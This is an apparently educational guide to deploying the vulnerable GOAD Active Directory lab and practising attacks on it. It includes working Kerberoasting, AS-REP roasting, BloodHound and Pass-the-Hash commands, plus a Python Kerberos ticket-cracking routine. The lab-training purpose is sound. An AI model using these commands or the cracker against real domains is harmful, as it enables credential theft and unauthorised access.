ETHICAL AND LEGAL DISCLAIMER
GOAD is a strictly educational pentest laboratory. Any use outside a controlled educational context is prohibited. Use only on a dedicated infrastructure (VirtualBox/VMware).
Objective
Deploy a vulnerable Active Directory environment (GOAD) to learn auditing and pentesting techniques on Windows infrastructure (OSCP/CRTE).
Prerequisites
- Host machine with minimum 16 GB RAM
- VirtualBox 7.0+ or VMware Workstation
- Ansible installed (Linux/WSL)
- Vagrant installed
- 250 GB free disk space
GOAD Architecture
5 Windows Server VMs on the VirtualBox host-only network 192.168.56.0/24, spread over two forests:
- DC01 (192.168.56.10): kingslanding, domain controller of SEVENKINGDOMS.LOCAL (forest root)
- DC02 (192.168.56.11): winterfell, domain controller of NORTH.SEVENKINGDOMS.LOCAL (child domain of sevenkingdoms.local)
- DC03 (192.168.56.12): meereen, domain controller of ESSOS.LOCAL (separate forest, trusted by sevenkingdoms.local)
- SRV02 (192.168.56.22): castelblack, member server of NORTH.SEVENKINGDOMS.LOCAL with MSSQL and IIS
- SRV03 (192.168.56.23): braavos, member server of ESSOS.LOCAL with MSSQL and SMB shares
Built-in vulnerabilities
- Kerberoasting
- AS-REP Roasting
- Golden Ticket / Silver Ticket
- DCSync
- NTLM Relay
- Privilege escalation via GPO
- Pass-the-Hash / Pass-the-Ticket
- Unconstrained / Constrained Delegation
Installation from WSL2 (Windows)
Step 1: Install dependencies
# Update WSL2 Ubuntu
sudo apt update && sudo apt upgrade -y
# Install Ansible, pip and git
sudo apt install -y ansible python3-pip git
# Install pywinrm (required for Ansible to reach the Windows VMs over WinRM)
# On Ubuntu 23.04+ pip refuses system-wide installs: use a venv or add --user
pip3 install pywinrm
# Verify
ansible --version
Step 2: Install Vagrant
# Download the Vagrant .deb for Linux (2.4.1 at the time of writing; check releases.hashicorp.com for the current version)
wget https://releases.hashicorp.com/vagrant/2.4.1/vagrant_2.4.1-1_amd64.deb
# Install
sudo dpkg -i vagrant_2.4.1-1_amd64.deb
# Verify
vagrant --version
Step 3: Install VirtualBox on Windows
- Download VirtualBox 7.0+ from virtualbox.org
- Install on Windows (not in WSL)
- Install the VirtualBox Extension Pack
Step 4: Clone GOAD from WSL
cd ~
git clone https://github.com/Orange-Cyberdefense/GOAD.git
cd GOAD
Step 5: Configure Vagrant for VirtualBox
# Install the Vagrant plugins GOAD's Vagrantfile relies on (guest additions handling and reboots during provisioning)
vagrant plugin install vagrant-vbguest
vagrant plugin install vagrant-reload
# Let Vagrant running inside WSL drive the VirtualBox installed on Windows.
# Replace YourUsername with your Windows user name, add both lines to ~/.bashrc so they survive a new shell,
# and make sure VBoxManage.exe is reachable (its folder, /mnt/c/Program Files/Oracle/VirtualBox, must be on PATH)
export VAGRANT_WSL_ENABLE_WINDOWS_ACCESS="1"
export VAGRANT_WSL_WINDOWS_ACCESS_USER_HOME_PATH="/mnt/c/Users/YourUsername"
Step 6: Deploy the VMs
cd ~/GOAD/ad/GOAD/providers/virtualbox
# Launch creation of the 5 VMs (duration: 30-60 min)
vagrant up
Info: Windows Server VMs are automatically downloaded from Vagrant Cloud (Windows Server 2016/2019 boxes).
Step 7: Ansible provisioning
cd ~/GOAD/ansible
# Install the required Ansible collections
ansible-galaxy install -r requirements.yml
# Run provisioning (AD configuration + deliberate vulnerabilities)
ansible-playbook -i ../ad/GOAD/data/inventory -i ../ad/GOAD/providers/virtualbox/inventory main.yml
Total duration: 1h30 to 2h depending on the host machine.
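Before committing to a deployment that long, it is worth checking the prerequisites from the list above and the WSL settings from Step 5 in one go. The script below is an added example, not part of GOAD or its documentation: it reads total RAM from /proc/meminfo, free space on the home filesystem, the tools on PATH, and the two Vagrant/WSL variables, and it flags the "YourUsername" placeholder because the Windows profile path must be real for Vagrant to reach VirtualBox. Thresholds are the ones on this page.

```python
"""Preflight check before deploying GOAD from WSL2.

Added example, not part of GOAD: it verifies the prerequisites listed above and the
Vagrant/WSL settings from Step 5 before committing to a one- to two-hour deployment.
Thresholds and variable names are the ones on this page; "YourUsername" is flagged
because the Windows profile path must be real for Vagrant to reach VirtualBox.
"""
import os
import shutil

MIN_RAM_GB = 16
MIN_DISK_GB = 250
REQUIRED_TOOLS = ("vagrant", "ansible", "ansible-playbook", "ansible-galaxy", "git")
ENABLE_VAR = "VAGRANT_WSL_ENABLE_WINDOWS_ACCESS"
HOME_VAR = "VAGRANT_WSL_WINDOWS_ACCESS_USER_HOME_PATH"


def ram_gb_from_meminfo(text):
    """Total RAM in GB from the content of /proc/meminfo (MemTotal is given in kB)."""
    for line in text.splitlines():
        if line.startswith("MemTotal:"):
            return int(line.split()[1]) / (1024 * 1024)
    raise ValueError("MemTotal not found")


def free_disk_gb(path):
    """Free space in GB on the filesystem holding path (where the boxes and .vagrant dirs go)."""
    st = os.statvfs(path)
    return st.f_bavail * st.f_frsize / 1024 ** 3


def env_problems(env):
    """Problems with the two Vagrant/WSL variables from Step 5, given an environment mapping."""
    problems = []
    if env.get(ENABLE_VAR) != "1":
        problems.append(f"{ENABLE_VAR} must be set to 1")
    home = env.get(HOME_VAR, "")
    if not home.startswith("/mnt/"):
        problems.append(f"{HOME_VAR} must point at the Windows profile under /mnt/<drive>/Users/...")
    elif "YourUsername" in home:
        problems.append(f"{HOME_VAR} still contains the placeholder YourUsername")
    return problems


def preflight(ram_gb, disk_gb, tools_found, env):
    """List of blocking problems; an empty list means the host is ready for vagrant up."""
    problems = []
    if ram_gb < MIN_RAM_GB:
        problems.append(f"RAM {ram_gb:.1f} GB is below the {MIN_RAM_GB} GB minimum")
    if disk_gb < MIN_DISK_GB:
        problems.append(f"free disk {disk_gb:.0f} GB is below the {MIN_DISK_GB} GB minimum")
    for tool in REQUIRED_TOOLS:
        if tool not in tools_found:
            problems.append(f"{tool} is not on PATH")
    return problems + env_problems(env)


if __name__ == "__main__":
    with open("/proc/meminfo") as fh:
        ram = ram_gb_from_meminfo(fh.read())
    disk = free_disk_gb(os.path.expanduser("~"))
    tools = {t for t in REQUIRED_TOOLS if shutil.which(t)}
    found = preflight(ram, disk, tools, dict(os.environ))
    for problem in found:
        print("FAIL:", problem)
    print("ready for vagrant up" if not found else f"{len(found)} problem(s) to fix first")
    raise SystemExit(1 if found else 0)
```

Run it from the WSL shell in which you exported the variables; a non-zero exit code means something on the list above is missing.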
Lab Verification
Connectivity test
# From your attacker VM (Kali/Parrot) with a network adapter on the same VirtualBox host-only network, 192.168.56.0/24
ping 192.168.56.10
ping 192.168.56.11
ping 192.168.56.12
AD enumeration with CrackMapExec
# Install CME
sudo apt install crackmapexec -y
# Network scan: lists hostname, domain, OS version and signing status of every SMB host
crackmapexec smb 192.168.56.0/24
# Authentication test with the Vagrant provisioning account (a lab-management account, not part of an attack path;
# add --local-auth when testing it against the member servers)
crackmapexec smb 192.168.56.10 -u 'vagrant' -p 'vagrant'
LDAP enumeration
# Authenticated simple bind and search of the NORTH domain, against its own DC (DC02, winterfell)
ldapsearch -x -H ldap://192.168.56.11 -D "vagrant@north.sevenkingdoms.local" -w 'vagrant' -b "dc=north,dc=sevenkingdoms,dc=local"
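ldapsearch needs a client and a password; the RootDSE of an Active Directory DC can be read without binding at all, which makes it a good "is this DC serving the right domain" check. The script below is an added example, not GOAD code and not the ldapsearch invocation above rewritten: it hand-encodes the LDAP SearchRequest in BER, sends it to each DC on 389, decodes the SearchResultEntry and compares defaultNamingContext with what the architecture section says each DC should hold (those expected values are assumed from that section).

```python
"""Anonymous RootDSE check of the GOAD domain controllers.

Added example, not GOAD code. ldapsearch above needs a client and credentials; the
RootDSE of an AD DC is readable without a bind, so a few lines of hand-built BER
verify from the attacker VM that each DC answers on 389 and serves the naming
context it should. Expected contexts follow the architecture section; the offline
test feeds the parser a reply produced by the same encoder.
"""
import socket

EXPECTED = {                              # DC -> defaultNamingContext it must report
    "192.168.56.10": "DC=sevenkingdoms,DC=local",
    "192.168.56.11": "DC=north,DC=sevenkingdoms,DC=local",
    "192.168.56.12": "DC=essos,DC=local",
}

def tlv(tag: int, body: bytes) -> bytes:
    """One BER TLV: short-form length below 128 bytes, long form above."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body

def rootdse_request(attr: str = "defaultNamingContext", msg_id: int = 1) -> bytes:
    """LDAPMessage { msg_id, SearchRequest base="" scope=baseObject filter=(objectClass=*) }."""
    search = (tlv(0x04, b"")                                  # baseObject "" = RootDSE
              + tlv(0x0A, b"\x00") + tlv(0x0A, b"\x00")       # scope baseObject, derefAliases never
              + tlv(0x02, b"\x00") + tlv(0x02, b"\x00")       # sizeLimit 0, timeLimit 0
              + tlv(0x01, b"\x00")                            # typesOnly FALSE
              + tlv(0x87, b"objectClass")                     # filter: present [CONTEXT 7]
              + tlv(0x30, tlv(0x04, attr.encode())))         # attributes to return
    return tlv(0x30, tlv(0x02, bytes([msg_id])) + tlv(0x63, search))   # 0x63 = [APPLICATION 3]

def parse_tlv(buf: bytes, pos: int = 0):
    """(tag, value, position after the element) for the TLV at pos."""
    tag, n, pos = buf[pos], buf[pos + 1], pos + 2
    if n & 0x80:
        k = n & 0x7F
        n, pos = int.from_bytes(buf[pos:pos + k], "big"), pos + k
    return tag, buf[pos:pos + n], pos + n

def children(buf: bytes):
    """All top-level (tag, value) pairs inside a constructed value."""
    out, pos = [], 0
    while pos < len(buf):
        tag, val, pos = parse_tlv(buf, pos)
        out.append((tag, val))
    return out

def parse_search_entry(message: bytes) -> dict:
    """{attribute: [values]} from a SearchResultEntry (0x64); {} for any other LDAPMessage."""
    op_tag, op = children(parse_tlv(message)[1])[1]
    if op_tag != 0x64:
        return {}
    _dn, (_, attrs) = children(op)
    result = {}
    for _, attr in children(attrs):
        (_, name), (_, vals) = children(attr)
        result[name.decode()] = [v.decode() for _, v in children(vals)]
    return result

def _recv_exact(sock, n: int) -> bytes:
    data = b""
    while len(data) < n:
        chunk = sock.recv(n - len(data))
        if not chunk:
            raise ConnectionError("connection closed mid-message")
        data += chunk
    return data

def read_message(sock) -> bytes:
    """Read one complete LDAPMessage, honouring long-form BER lengths."""
    head = _recv_exact(sock, 2)
    length = head[1]
    if length & 0x80:
        lb = _recv_exact(sock, length & 0x7F)
        head, length = head + lb, int.from_bytes(lb, "big")
    return head + _recv_exact(sock, length)

def default_naming_context(host: str, port: int = 389, timeout: float = 3.0):
    """The DC's defaultNamingContext, or None if it closes the search without an entry."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(rootdse_request())
        while True:
            msg = read_message(s)
            entry = parse_search_entry(msg)
            if entry:
                return entry.get("defaultNamingContext", [None])[0]
            if children(parse_tlv(msg)[1])[1][0] == 0x65:     # SearchResultDone, no entry
                return None

if __name__ == "__main__":
    for host, expected in EXPECTED.items():
        try:
            got = default_naming_context(host)
        except OSError as exc:
            got = f"unreachable ({exc})"
        print(f"{host}: {'OK' if got == expected else 'MISMATCH'} {got}")
```

A MISMATCH on a reachable host usually means the Ansible step did not finish promoting that DC; "unreachable" with a timeout means the attacker VM is not on the host-only network.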
Attack Scenarios (Educational Examples)
1. Kerberoasting with Impacket
# Request a TGS for every account that has an SPN and save the tickets in hashcat format
GetUserSPNs.py -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/vagrant:vagrant -outputfile hash.txt
# Crack offline (mode 13100 = Kerberos 5 TGS-REP etype 23, RC4-HMAC; AES tickets need modes 19600/19700)
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
2. AS-REP Roasting
# Ask the KDC for an AS-REP for each name in users.txt (a list of candidate usernames): accounts flagged
# "Do not require Kerberos preauthentication" answer with an enc-part keyed on their own password
GetNPUsers.py north.sevenkingdoms.local/ -dc-ip 192.168.56.11 -usersfile users.txt -format hashcat -outputfile asrep.txt
# Crack offline (mode 18200 = Kerberos 5 AS-REP etype 23)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
3. BloodHound - Attack path analysis
# Install BloodHound (GUI + neo4j) and the Python collector
sudo apt install bloodhound neo4j -y
pip3 install bloodhound
# Collect data with bloodhound-python (the Python port of SharpHound) from the attacker VM,
# resolving names through the DC's DNS
bloodhound-python -d north.sevenkingdoms.local -u vagrant -p vagrant -dc winterfell.north.sevenkingdoms.local -ns 192.168.56.11 -c All
# Start neo4j (change the default neo4j/neo4j password on first login at http://localhost:7474),
# then BloodHound, and import the JSON files produced by the collector
sudo neo4j console
bloodhound
4. Pass-the-Hash with CrackMapExec
# After dumping NTLM hashes (for example with secretsdump.py), replay the NT hash instead of a password.
# The value below is the empty LM hash followed by the NT hash of an empty password (MD4 of ""), shown as a
# placeholder: substitute the dumped LM:NT pair. --local-auth is for a local Administrator hash taken from a
# SAM dump; omit it for a domain account's hash obtained through DCSync.
crackmapexec smb 192.168.56.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 --local-auth
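Scenarios 1, 2 and 4 rest on one fact: with RC4-HMAC (etype 23) the Kerberos key of an account is its NT hash, MD4 over the UTF-16LE password. That is why a TGS or AS-REP blob can be cracked offline (hashcat only has to re-derive an HMAC-MD5 checksum per candidate) and why the same hash can be replayed directly in Pass-the-Hash. The block below is an added example, not code from GOAD, Impacket or hashcat: it implements the RFC 4757 check that modes 13100 and 18200 perform, parses the hashcat lines written by GetUserSPNs.py and GetNPUsers.py, and shows that the NT hash in the Pass-the-Hash command above is MD4 of an empty password. The usernames, passwords and "captured" hashes are constructed locally for the demonstration.

```python
"""One secret behind scenarios 1, 2 and 4: the NT hash is the Kerberos RC4 key.

Added example, not code from GOAD, Impacket or hashcat. With RC4-HMAC (etype 23) the
Kerberos key is the NT hash (MD4 of the UTF-16LE password), so a roasted TGS-REP or
AS-REP blob is tested offline the way hashcat -m 13100 / 18200 do it: derive the key
from a candidate, re-derive the HMAC-MD5 checksum, compare. Pass-the-Hash replays that
same hash. MD4 is written out because hashlib only has it via OpenSSL's legacy provider.
All "captured" hashes, usernames and passwords below are constructed, not GOAD data.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF
KEY_USAGE = {"tgs": 2, "asrep": 8}   # key usage numbers behind hashcat -m 13100 and -m 18200

def md4(data: bytes) -> bytes:
    # RFC 1320 MD4, the one primitive Python lacks for the NT hash
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    rounds = ((F, 0, (3, 7, 11, 19), range(16)),
              (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
              (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)))
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64) + struct.pack("<Q", len(data) * 8)
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[idx] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c
        A, B, C, D = (A + a) & MASK, (B + b) & MASK, (C + c) & MASK, (D + d) & MASK
    return struct.pack("<4I", A, B, C, D)

def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def hmac_md5(key: bytes, msg: bytes) -> bytes: return hmac.new(key, msg, hashlib.md5).digest()

def rc4_hmac_encrypt(nt: bytes, usage: int, confounder: bytes, plaintext: bytes) -> bytes:
    """RFC 4757 encryption as the KDC does it: checksum || RC4(K3, confounder || plaintext)."""
    k1 = hmac_md5(nt, struct.pack("<I", usage))
    checksum = hmac_md5(k1, confounder + plaintext)
    return checksum + rc4(hmac_md5(k1, checksum), confounder + plaintext)

def rc4_hmac_check(nt: bytes, usage: int, checksum: bytes, edata: bytes) -> bool:
    """The cracker's inner loop: does this NT hash reproduce the captured checksum?"""
    k1 = hmac_md5(nt, struct.pack("<I", usage))
    return hmac.compare_digest(hmac_md5(k1, rc4(hmac_md5(k1, checksum), edata)), checksum)

def parse_hashcat_line(line: str):
    """(kind, user, checksum, edata) from the lines GetUserSPNs.py / GetNPUsers.py write for hashcat."""
    if line.startswith("$krb5tgs$23$*"):            # $krb5tgs$23$*user$REALM$spn*$checksum$edata
        head, checksum, edata = line.rsplit("$", 2)
        kind, user = "tgs", head[13:].split("$")[0]
    elif line.startswith("$krb5asrep$23$"):         # $krb5asrep$23$user@REALM:checksum$edata
        ident, rest = line[14:].split(":", 1)
        checksum, edata = rest.split("$", 1)
        kind, user = "asrep", ident.split("@")[0]
    else:
        raise ValueError("not an etype-23 krb5tgs/krb5asrep line")
    return kind, user, bytes.fromhex(checksum), bytes.fromhex(edata)

def crack(line: str, wordlist):
    """(user, password); password is None when no candidate verifies."""
    kind, user, checksum, edata = parse_hashcat_line(line)
    for candidate in wordlist:
        if rc4_hmac_check(nt_hash(candidate), KEY_USAGE[kind], checksum, edata):
            return user, candidate
    return user, None

def make_sample(kind: str, user: str, realm: str, password: str, spn: str = "MSSQLSvc/host") -> str:
    """Constructed capture for the demo: fixed confounder, stand-in plaintext, known password."""
    blob = rc4_hmac_encrypt(nt_hash(password), KEY_USAGE[kind], b"\x11" * 8, b"\x63\x82\x01\x00" * 4)
    checksum, edata = blob[:16].hex(), blob[16:].hex()
    if kind == "tgs":
        return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum}${edata}"
    return f"$krb5asrep$23${user}@{realm}:{checksum}${edata}"

if __name__ == "__main__":
    line = make_sample("tgs", "svc_sql", "NORTH.SEVENKINGDOMS.LOCAL", "Winter2024!")   # constructed
    print(crack(line, ["Password1", "Summer2023", "Winter2024!"]))
    print(nt_hash("").hex())   # the NT half of the LM:NT pair in the Pass-the-Hash command above
```

The key usage number is what separates the two modes: a TGS ticket is encrypted under usage 2, an AS-REP enc-part under usage 8, and a blob checked with the wrong usage never verifies even with the right password. Real captures also carry a random confounder and a DER-encoded EncTicketPart, which is why hashcat can pre-filter on the decrypted ASN.1 before computing the HMAC; the check above is the full, unoptimised one.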
Lab Management
Useful Vagrant commands
# Check VM status
vagrant status
# Stop all VMs
vagrant halt
# Start all VMs
vagrant up
# Destroy the lab completely
vagrant destroy -f
# Re-run the Vagrant provisioners on existing VMs (this does not rerun the Ansible step; repeat Step 7 for that)
vagrant up --provision
# Redeploy from scratch: vagrant destroy -f, then vagrant up, then Step 7 again
VirtualBox Snapshots
Create a snapshot of each VM once the installation is complete, with the VMs powered off (vagrant halt) so the five snapshots are consistent with each other:
- Open VirtualBox GUI
- Select each GOAD VM
- Machine → Take Snapshot
- Name: "GOAD_Clean_Install"
Allows restoring the lab to a clean state after exercises.
Key Points for the BTS Oral
- GOAD: vulnerable AD environment for pentest training
- Ethical use: never on real infrastructure without authorisation
- Kerberoasting: any domain user can request a TGS for an account that has an SPN; the ticket is encrypted with that account's password hash and is cracked offline
- AS-REP Roasting: accounts flagged "Do not require Kerberos preauthentication" return an AS-REP encrypted with their own password hash, crackable offline
- BloodHound: AD attack path mapping tool (graph of sessions, group memberships and ACLs)
- Pass-the-Hash: authenticating over NTLM with the NT hash itself, no password needed
- DCSync: abusing directory replication rights (DS-Replication-Get-Changes) to pull every account's hash from a DC
- Golden Ticket: forging a Kerberos TGT with the krbtgt account's hash
- Vagrant + Ansible: infrastructure deployment automation
LEGAL REMINDER
These techniques are presented in an educational BTS SIO SISR context. Their use in real conditions without written authorisation constitutes a criminal offence (French Penal Code art. 323-1 to 323-7). Penalties: up to 5 years imprisonment + €150,000 fine.